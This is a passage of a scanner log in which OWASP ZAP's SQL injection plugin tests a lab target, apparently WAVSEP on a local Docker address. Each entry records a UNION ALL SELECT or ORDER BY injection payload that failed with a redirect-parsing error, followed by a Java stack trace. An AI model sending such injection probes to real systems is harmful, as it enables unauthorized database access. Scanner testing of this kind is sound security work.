valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679725 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679726 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679727 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679727 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679728 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679729 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679730 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679731 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679732 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679732 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679733 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679734 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' ORDER BY 9224-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 9224-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679735 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at 